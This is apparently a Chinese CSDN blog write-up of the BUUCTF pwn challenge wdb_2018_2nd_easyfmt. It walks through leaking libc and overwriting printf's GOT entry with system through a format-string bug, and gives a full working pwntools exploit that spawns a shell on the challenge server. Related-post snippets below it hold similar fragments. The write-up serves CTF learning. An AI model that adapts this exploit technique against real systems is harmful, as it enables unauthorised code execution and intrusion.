wdb_2018_2nd_easyfmt详解

最新推荐文章于 2023-09-30 16:48:40 发布
最新推荐文章于 2023-09-30 16:48:40 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: CTF 文章标签: buu easyfmt
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/116140885
版权

wdb_2018_2nd_easyfmt详解

自己做出来了,,,,还看其他人的

参考:wdb_2018_2nd_easyfmt

程序流程

程序流程非常简单,可以一直进行格式化字符串漏洞。

在这里插入图片描述

漏洞利用

  1. 首先通过格式化字符串泄露栈信息
  2. 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,)
  3. 发送“/bin/sh\x00”,

详细过程

0.查看基本信息

32位程序,只开了nx

winter@ubuntu:~/buu$ file wdb_2018_2nd_easyfmt 
wdb_2018_2nd_easyfmt: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=f86851c3576d0aabf0b0b2310d835d0f6e660eb8, not stripped
winter@ubuntu:~/buu$ checksec wdb_2018_2nd_easyfmt 
[*] '/home/winter/buu/wdb_2018_2nd_easyfmt'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

格式化字符串,偏移为6

在这里插入图片描述

1.泄露信息
方法一:栈上数据

可以直接查看栈上的信息进行泄露

pwndbg> stack 30
00:0000│ esp      0xffffcfbc —▸ 0x80485cf (main+132) ◂— add    esp, 0x10
01:0004│          0xffffcfc0 —▸ 0xffffcfd8 ◂— 'aaaa\n'
... ↓
03:000c│          0xffffcfc8 ◂— 0x64 /* 'd' */
04:0010│          0xffffcfcc —▸ 0xf7e9379b (handle_intel+107) ◂— add    esp, 0x10	#libc中的数据,计算偏移即可得到libc基址
05:0014│          0xffffcfd0 —▸ 0xffffcffe —▸ 0xffff0000 ◂— 0x0
06:0018│          0xffffcfd4 —▸ 0xffffd0fc —▸ 0xffffd2e9 ◂— 'XDG_VTNR=7'

p.recvuntil("Do you know repeater?")
payload = "%3$p"
p.sendline(payload)
handle_intel_107 = p.recvuntil("f7")[-2:]
handle_intel_107 += p.recv(8)
handle_intel_107 = int(handle_intel_107,16)
log.success(hex(handle_intel_107))

#[+] 0xf7e658fb

通过脚本输出

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 0x8048000  0x8049000 r-xp     1000 0      /home/winter/buu/wdb_2018_2nd_easyfmt
 0x8049000  0x804a000 r--p     1000 0      /home/winter/buu/wdb_2018_2nd_easyfmt
 0x804a000  0x804b000 rw-p     1000 1000   /home/winter/buu/wdb_2018_2nd_easyfmt
0xf7dd5000 0xf7dd6000 rw-p     1000 0      
0xf7dd6000 0xf7f83000 r-xp   1ad000 0      /home/winter/buu/libc-2.23-32.so
0xf7f83000 0xf7f84000 ---p     1000 1ad000 /home/winter/buu/libc-2.23-32.so
0xf7f84000 0xf7f86000 r--p     2000 1ad000 /home/winter/buu/libc-2.23-32.so
0xf7f86000 0xf7f87000 rw-p     1000 1af000 /home/winter/buu/libc-2.23-32.so
0xf7f87000 0xf7f8b000 rw-p     4000 0      
0xf7f8b000 0xf7f8e000 r--p     3000 0      [vvar]
0xf7f8e000 0xf7f90000 r-xp     2000 0      [vdso]
0xf7f90000 0xf7fb3000 r-xp    23000 0      /lib/i386-linux-gnu/ld-2.23.so
0xf7fb3000 0xf7fb4000 r--p     1000 22000  /lib/i386-linux-gnu/ld-2.23.so
0xf7fb4000 0xf7fb5000 rw-p     1000 23000  /lib/i386-linux-gnu/ld-2.23.so
0xff999000 0xff9ba000 rw-p    21000 0      [stack]

计算偏移为:0xf7e658fb - 0xf7dd6000 = 0x8F8FB

故可以得到libc_base

libc_base = handle_intel_107 - 0x8f8fb - 0x20	#0x20是因为远程的时候,发现好像有0x20的偏移,一般libc_base是000结尾,但是原来是020结尾,故猜测还要再减去0x20
log.success(hex(libc_base))
方法二:直接泄露got表信息(方便)
p.recvuntil("Do you know repeater?")
payload = p32(elf.got['printf']) + "%6$s"
p.sendline(payload)
printf_addr = u32(p.recvuntil("\xf7")[-4:])
print(hex(printf_addr))
libc_base = printf_addr - libc.sym['printf']

因为偏移是6,所以直接输入printf_got,输出该地址内容时候,就泄露了printf的地址。

2.格式化字符串写printf_got

利用pwntool的工具来做

system = libc_base + libc.sym['system']
printf_got = elf.got['printf']

payload = fmtstr_payload(offset,{printf_got:system})
p.sendline(payload)

pwndbg> x/30wx 0x804a014
0x804a014:	0xf7e3a940	0xf7e5f140	0xf7e18540	0xf7e60da0

pwndbg> x/30wx 0xf7e3a940
0xf7e3a940 <system>:	0x8b0cec83	0xe8102444	0x000e2941	0x56b4c281
3.发送"/bin/sh\x00"字符串
p.sendline("/bin/sh\x00")

执行printf(&buf); => system("/bin/sh\x00")

完整exp

from pwn import *

# p = process("./wdb_2018_2nd_easyfmt")
p=process(['./wdb_2018_2nd_easyfmt'],env={"LD_PRELOAD":"/home/winter/buu/libc-2.23-32.so"})
p=remote("node3.buuoj.cn",25745)
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF("./wdb_2018_2nd_easyfmt")
# libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")

libc = ELF("/home/winter/buu/libc-2.23-32.so")

# p.recvuntil("Do you know repeater?")
# payload = "%3$p"
# p.sendline(payload)
# handle_intel_107 = p.recvuntil("f7")[-2:]
# handle_intel_107 += p.recv(8)
# handle_intel_107 = int(handle_intel_107,16)
# log.success(hex(handle_intel_107))

# libc_base = handle_intel_107 - 0x8f8fb - 0x20	#direct sub
# log.success(hex(libc_base))
p.recvuntil("Do you know repeater?")
payload = p32(elf.got['printf']) + "%6$s"
p.sendline(payload)
printf_addr = u32(p.recvuntil("\xf7")[-4:])
print(hex(printf_addr))
libc_base = printf_addr - libc.sym['printf']

system = libc_base + libc.sym['system']
printf_got = elf.got['printf']
offset = 6
log.success(hex(printf_got))
payload = fmtstr_payload(offset,{printf_got:system})
p.sendline(payload)
p.sendline("/bin/sh\x00")

# gdb.attach(p)
# pause()
p.interactive()
书文的学习记录本
关注
专栏目录
easyfmt(xctf)
weixin_43868725的博客
08-20 486
0x0 程序保护和流程 保护: 流程: main() 可以发现在if中存在格式化字符串漏洞。但需要通过CheckIn()的返回值决定是否执行if中的语句。 通过一个time()获取当前时间,并将当前时间当成srand()的seed,之后根据seed产生出的随机数对5取模再加48存放在v3[0]中,之后将输入的值跟v1进行比较返回结果。 0x1 利用过程 1.想要利用格式化字符串漏洞就必须绕过CheckIn()的限制,因为反汇编出来的源码可能会有一点问题,因此对汇编代码进行分析。 通过分析可知程序将随
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 459
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
wdb_2018_2nd_easyfmt
最新发布
qq_62887641的博客
09-30 656
32位只开了NX这题get到一点小知识(看我exp就知道了程序很简单,格式化字符串漏洞,并且无限使用没有system函数。
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
Y_peak的博客
03-17 707
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址 寻找system的实际地址 将printf_got修改为system的地址 写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote('node3.buuoj.cn',25125) #p = process("./
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 644
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
m_map地理地图底图matlab工具包
12-21
《m_map地理地图底图Matlab工具包详解》 在数据可视化和科学研究中,地图底图的使用至关重要,它能够帮助我们直观地展示地理位置信息。Matlab作为一种强大的数学计算和图形绘制软件,提供了多种工具箱来支持地图...
格式化字符串漏洞的介绍
01-20
自己学习的时候做的一个ppt,是花了一些心血的,希望对别人能够有所帮助。主要是格式化字符串漏洞的一些介绍,还是挺详细的。
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got表)
mcmuyanga的博客
03-08 926
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
buuoj刷题记录 - wdb_2018_2nd_easyfmt
qq_34010404的博客
03-26 279
程序很简单,while(1)反复利用fmt漏洞: 泄露libc地址: main函数是由__libc_start_main函数调用的,所以main执行时,ebp下面那个就是__libc_start_main中的地址,而__libc_start_main函数是位于libc中的,利用printf把返回地址打出来就可以泄露libc基址了. 之后便可以劫持got了,直接改printf为system得需要修改4个字节,打远程还是算了,这里提供另一种方法. 把printf的got改为某个gadget,这个gadge
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 2062
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1133
这题出的很奇怪,本地调试不知道为什么出问题,远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got表的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
攻防世界easyfmt
needlebulb的博客
06-12 302
主要思路为猜对后利用格式化字符串漏洞改写exit的got地址变成main函数过checkIn函数判断后的地址,这样就可以让程序反复执行且跳过猜数环节,然后格式化泄露puts的got地址,找到libc偏移,得到system地址,第三次循环改写printf的got变为system地址,第四次循环read时写入/bin/sh,完成getshell...
[XCTF-pwn] 25_easyfmt
weixin_52640415的博客
03-08 486
格式化字符串漏洞,got.exit劫持,got.printf劫持 这题比上题要简单,先修改got.exit为main进入循环并漏洞libc地址,再将printf改为system,再输入/bin/sh int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+10h] [rbp-110h] BYREF unsigned __int64 v4; // [r
[网鼎杯 2018]Comment
Sk1y的博客
01-14 555
文章目录[CSCCTF 2019 Qual]FlaskLight解题过程payload1payload2payload3参考文章[RCTF2015]EasySQL解题过程payload参考文章[HITCON 2017]SSRFme解题过程payload参考文章[网鼎杯 2018]Comment解题过程payload参考文章 [CSCCTF 2019 Qual]FlaskLight 解题过程 f12中提示,GET方式传参search可以判断ssti 查看所有子类 ?search={{''.__class_
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2635
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,选择要导出的波形文件并指定输出文件路径和文件名。 4. 点击“OK”按钮,Vivado将导出WDB文件到指定的输出路径中。 5. 您可以使用其他工具打开WDB文件,例如Xilinx的ChipScope Pro或Aldec的Active-HDL。 注意:在导出WDB文件时,您可能需要指定正确的波形信息,例如时钟频率和时钟相位,以确保正确地还原波形。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值